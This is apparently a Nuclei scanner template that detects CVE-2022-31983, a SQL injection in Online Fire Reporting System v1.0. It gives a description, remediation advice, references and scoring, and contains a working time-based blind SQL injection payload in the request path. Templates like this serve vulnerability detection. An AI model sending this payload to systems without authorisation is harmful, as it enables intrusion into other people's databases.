nuclei-templates/http/cves/2022/CVE-2022-31983.yaml

43 lines
1.7 KiB
YAML

id: CVE-2022-31983
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
remediation: |
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31983
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31983
cwe-id: CWE-89
epss-score: 0.00609
epss-percentile: 0.76244
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and
# digest: 4b0a00483046022100da6b3aceac322bc4449d4be7ae11538db7d76b817689cb0bfc82b0394fba4d64022100e95131097cbe23fd9db624feaf6a26a885d3e342109d7ee187c1b138aa627aac:922c64590222798bb761d5b6d8e72950